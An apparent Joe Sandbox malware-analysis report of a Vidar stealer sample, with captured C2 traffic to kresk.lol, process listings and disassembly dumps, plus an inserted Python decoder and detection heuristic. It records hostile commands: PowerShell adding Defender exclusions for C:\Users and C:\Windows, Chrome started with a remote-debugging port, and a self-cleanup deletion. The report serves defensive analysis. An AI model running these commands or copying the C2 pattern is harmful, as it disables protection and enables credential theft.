38 | 192.168.2.4 | 49871 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:38 UTC | 316 | OUT | POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----T0HDJE3EC2VAIM7GLNO8
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
2024-12-04 16:05:38 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 54 30 48 44 4a 45 33 45 43 32 56 41 49 4d 37 47 4c 4e 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 54 30 48 44 4a 45 33 45 43 32 56 41 49 4d 37 47 4c 4e 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 54 30 48 44 4a 45 33 45 43 32 56 41 49 4d 37 47 4c 4e 4f 38 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------T0HDJE3EC2VAIM7GLNO8Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------T0HDJE3EC2VAIM7GLNO8Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------T0HDJE3EC2VAIM7GLNO8Cont
2024-12-04 16:05:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:39 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
2024-12-04 16:05:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0
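The check-ins above are printed by the sandbox as hex dumps of a multipart/form-data POST (fields token and build_id, always the same two values across sessions) and a chunked reply whose body is either "ok" or empty. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it converts the "Data Raw" hex of session 35 back into bytes, splits the multipart body on the boundary taken from that session's Content-Type header, skips the final part the sandbox cut off at "Cont", and dechunks the reply to "ok" (sessions 37 and 38 reply with only "0\r\n\r\n", which decodes to an empty body). The `looks_like_vidar_checkin` heuristic (both fields present, each a 32-character lowercase hex string) is derived only from these four captures; that it holds for other builds is an assumption, not a published signature.

```python
"""Decode the Joe Sandbox "Data Raw" dumps of the Vidar check-in traffic above.

Added example; not code from the report or from the sample. The inputs below
are copied from captured session 35 (request body and C2 reply).
"""
import re

# Constructed input: session 35 request body exactly as the sandbox printed it.
# The sandbox truncates the dump, so the last part ends mid-header at "Cont".
REQUEST_BODY_HEX = """
2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a
36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a
2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a
64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a
2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74
"""
# Boundary from the session's Content-Type header (without the leading "--").
REQUEST_BOUNDARY = "----AASR9H47QQ9ZUASRQ90H"
# C2 reply body from the same session, chunked: "2\r\nok\r\n0\r\n\r\n".
RESPONSE_BODY_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def hex_dump_to_bytes(dump: str) -> bytes:
    """Convert a space/newline-separated hex dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body.

    Parts are delimited by "--" + boundary; the closing delimiter carries a
    trailing "--". A final part with no complete header block (the sandbox cut
    the dump off) is skipped instead of raising.
    """
    delim = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):           # "--boundary--": end of body
            break
        part = part.lstrip(b"\r\n")          # drop the CRLF after the delimiter
        header_end = part.find(b"\r\n\r\n")
        if header_end == -1:
            continue                          # truncated part: headers incomplete
        headers = part[:header_end].decode("latin-1")
        name = re.search(r'name="([^"]*)"', headers)
        if name is None:
            continue
        value = part[header_end + 4:]
        if value.endswith(b"\r\n"):          # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1)] = value.decode("latin-1")
    return fields


def dechunk(body: bytes) -> bytes:
    """Decode HTTP/1.1 chunked transfer encoding: hex size line, data, CRLF, ..., 0."""
    out = bytearray()
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2                                   # skip data and its CRLF


def looks_like_vidar_checkin(fields: dict) -> bool:
    """Heuristic taken only from these captures (an assumption for other builds):
    both 'token' and 'build_id' present, each a 32-character lowercase hex value."""
    return all(HEX32.match(fields.get(k, "")) is not None for k in ("token", "build_id"))


if __name__ == "__main__":
    fields = parse_multipart(hex_dump_to_bytes(REQUEST_BODY_HEX), REQUEST_BOUNDARY)
    print(fields)
    print(dechunk(hex_dump_to_bytes(RESPONSE_BODY_HEX)))
    print(looks_like_vidar_checkin(fields))
```

Running it prints the two form fields ({'token': '6aeb446e65e3de6e8bd63f79e11152e9', 'build_id': 'd32ef9a4f5283c4820a5915619c67f72'}), the dechunked reply b'ok', and True. The same two functions apply unchanged to the 16355-byte uploads in session 36: only the boundary differs, and the parts after token and build_id carry the base64 payload that the dump cuts off.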


                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:11:03:52
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Ttok18.exe"
                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                      File size:22'020'096 bytes
                                                                                                                                                                      MD5 hash:3544B39481484F67F807E54DD58A93D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:1
Start time:11:03:53
Start date:04/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:11:03:57
Start date:04/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
Imagebase:0x140000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:11:03:57
Start date:04/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:11:03:58
Start date:04/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
Imagebase:0x140000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:11:04:01
Start date:04/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase:0x140000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:11:04:01
Start date:04/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:11:04:02
Start date:04/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Imagebase:0x140000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:11:04:06
Start date:04/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Imagebase:0x140000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:11:04:06
Start date:04/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:11:04:07
Start date:04/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Imagebase:0x140000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:11:04:23
Start date:04/12/2024
Path:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Wow64 process (32bit):true
Commandline:"C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe"
Imagebase:0x400000
File size:476'160 bytes
MD5 hash:F453C5F8C736FF8C381E7022CAD85E3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 45%, ReversingLabs
Has exited:true

Target ID:16
Start time:11:04:39
Start date:04/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:11:04:40
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:11:04:40
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:11:05:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:11:05:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:11:05:39
                                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                                      Imagebase:0x550000
                                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true


                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:23.5%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:3
                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                        execution_graph 3051 11e1170 3052 11e11b2 GetConsoleWindow 3051->3052 3053 11e11f2 3052->3053

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 73 11e0a40-11e0a68 74 11e0a6f-11e0ac5 call 11e10e0 call 11e1317 73->74 75 11e0a6a 73->75 78 11e0ac7-11e0ad0 74->78 79 11e0ad5-11e0ccc 74->79 75->74 82 11e1091-11e10d6 78->82 111 11e0daf-11e0dc3 79->111 112 11e0dc9-11e0dde 111->112 113 11e0cd1-11e0d17 111->113 116 11e0e5b-11e0e77 112->116 117 11e0d1e-11e0d51 113->117 118 11e0d19 113->118 119 11e0e7d-11e0e95 116->119 120 11e0de0-11e0e1f 116->120 125 11e0d58-11e0dac 117->125 126 11e0d53 117->126 118->117 122 11e0ede-11e0f1c call 11e013c 119->122 123 11e0e97-11e0edb 119->123 128 11e0e26-11e0e3e 120->128 129 11e0e21 120->129 141 11e0f24-11e0fa2 call 11e014c 122->141 123->122 125->111 126->125 138 11e0e46-11e0e58 128->138 129->128 138->116 148 11e102e-11e1036 141->148 149 11e0fa8-11e102c 141->149 152 11e1037-11e1038 148->152 149->152 152->82
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: a^q
                                                                                                                                                                        • API String ID: 0-3411664965
                                                                                                                                                                        • Opcode ID: 663eece13379a3fd4446772b578fd433b3928e6c5d8b528f3e233d87a55a0bdc
                                                                                                                                                                        • Instruction ID: 6f3ed4e14880a8ee6a21fce26cb215b496faf4d8a40e57b87326e8d38ac9c4ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 663eece13379a3fd4446772b578fd433b3928e6c5d8b528f3e233d87a55a0bdc
                                                                                                                                                                        • Instruction Fuzzy Hash: 7412CA74E00229CFDB14DFA9D984A9DBBF2FF88301F108559E918AB359DB74A985CF40

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 415 11e2309-11e2340 416 11e2347-11e23d9 415->416 417 11e2342 415->417 422 11e25c8-11e25d1 416->422 417->416 423 11e23de-11e23e7 422->423 424 11e25d7-11e25de 422->424 425 11e23ee-11e24fb call 11e19ac call 11e19bc 423->425 426 11e23e9 423->426 444 11e24fd-11e2518 425->444 445 11e2525-11e2540 425->445 426->425 449 11e2520-11e2523 444->449 450 11e2541-11e255c 445->450 449->450 452 11e255e 450->452 453 11e2568 450->453 454 11e2567 452->454 453->422 454->453
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 35613d85f136e564bc7dfd5e20a9ce398c53d15f4e88093da15895197815c0d5
                                                                                                                                                                        • Instruction ID: 30423c428a602f741238626ae69352857ddeb9178670cbfc8d5f4366cd9e3248
                                                                                                                                                                        • Opcode Fuzzy Hash: 35613d85f136e564bc7dfd5e20a9ce398c53d15f4e88093da15895197815c0d5
                                                                                                                                                                        • Instruction Fuzzy Hash: C4811574E01209DFDB18DFA9D994ADDBBB2FF89300F208129D805AB354DB34A886CF54

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 160 11e1168-11e11aa 162 11e11b2-11e11f0 GetConsoleWindow 160->162 163 11e11f9-11e1225 162->163 164 11e11f2-11e11f8 162->164 164->163
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2863861424-0
                                                                                                                                                                        • Opcode ID: ddc78f11b732a519f8d646ccc8d35de8661cb4117532f3ba62d53a1944d68853
                                                                                                                                                                        • Instruction ID: c07cebba879d3111e233e9a26f869e51e6b76ba9bef74ebb50e1fe3d796e289f
                                                                                                                                                                        • Opcode Fuzzy Hash: ddc78f11b732a519f8d646ccc8d35de8661cb4117532f3ba62d53a1944d68853
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D219AB8D012189FCB04CFA9D984ADEBBF4FB49314F20905AE818B7350D775A945CFA5

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 167 11e1170-11e11f0 GetConsoleWindow 169 11e11f9-11e1225 167->169 170 11e11f2-11e11f8 167->170 170->169
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1997998903.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11e0000_Ttok18.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • Opcode Fuzzy Hash: a1a56ea5f15a1e5f6068523ab2a18ca5a96855199b06d23ef92f10ddeb39e276
                                                                                                                                                                        • Instruction Fuzzy Hash: F731B074E006059FCB14DF79D598AAEBBF2FF88305F108628E41AA7390DB30AD05CB91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: piFk
                                                                                                                                                                        • API String ID: 0-1899945852
                                                                                                                                                                        • Opcode ID: 47e243b528558c481dbc31362beca3194e6ee6090573951080714021bbd57b9d
                                                                                                                                                                        • Instruction ID: b8b509c6c55edaf197884664f73fd235aa74446bf1310153e1712cc4c437fa4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 47e243b528558c481dbc31362beca3194e6ee6090573951080714021bbd57b9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D317E74A006158FCB14DF69D598A9EBBF2FF88305F148528E41AA7394DB30AC05CB91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (&^q
                                                                                                                                                                        • API String ID: 0-2067289071
                                                                                                                                                                        • Opcode ID: f89c8b94ce7513f34ccc29f5d00754144a70e01bc868fa3f9c2c81eee1a484c8
                                                                                                                                                                        • Instruction ID: 926ea5eed1f7b19c28ab0f5ad37066afcf6cbe3eb20130bd8bad6256aaa4bf46
                                                                                                                                                                        • Opcode Fuzzy Hash: f89c8b94ce7513f34ccc29f5d00754144a70e01bc868fa3f9c2c81eee1a484c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A21B071A042588FCB14DFAED404BAFBFF5EB89324F14846AD419E7340CB3599058FA5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l
                                                                                                                                                                        • API String ID: 0-1222872911
                                                                                                                                                                        • Opcode ID: 1da7559055b40c502e606b6d041ceb1e1ea076f8146277f4ad9fbf228158ddb8
                                                                                                                                                                        • Instruction ID: 5b07475d944e721696138c903eb410177574aac42647274a1bb62ea782331b62
                                                                                                                                                                        • Opcode Fuzzy Hash: 1da7559055b40c502e606b6d041ceb1e1ea076f8146277f4ad9fbf228158ddb8
                                                                                                                                                                        • Instruction Fuzzy Hash: B021CE30A043548FCF21DFB8D8446BE7FFAAF4620070445AAE955C7361DB74D904CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8b320fc1ffa0dc18bc4691545b0a5a4a5fd94f8905ec020bde9a74592884c4bd
                                                                                                                                                                        • Instruction ID: 1fb8a9025604498dd61389499bc9a72935c2b43d2617e3002780680a2d33bb5c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b320fc1ffa0dc18bc4691545b0a5a4a5fd94f8905ec020bde9a74592884c4bd
                                                                                                                                                                        • Instruction Fuzzy Hash: C7B11934E012489FDB14CFA8D588AADFBF2BF89314F258559E809AB351C771ED41CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9a3cbbcf9d347e40dd66885a125e159f4c86d5565cc9f93a0e1c2f84c0c1a6b4
                                                                                                                                                                        • Instruction ID: 84d6428ae77fe637f4a1ae1f84ca53f8a670dd740ca597d07f83da342f4b6037
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3cbbcf9d347e40dd66885a125e159f4c86d5565cc9f93a0e1c2f84c0c1a6b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D913C74A006468FCB15CF58C498ABEFBF2FF48314B248599D915AB3A5C736EC51CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2c172226acae7442b3bee0eca36e5d985fb581553b82d925dc371b1bd3ecf3e1
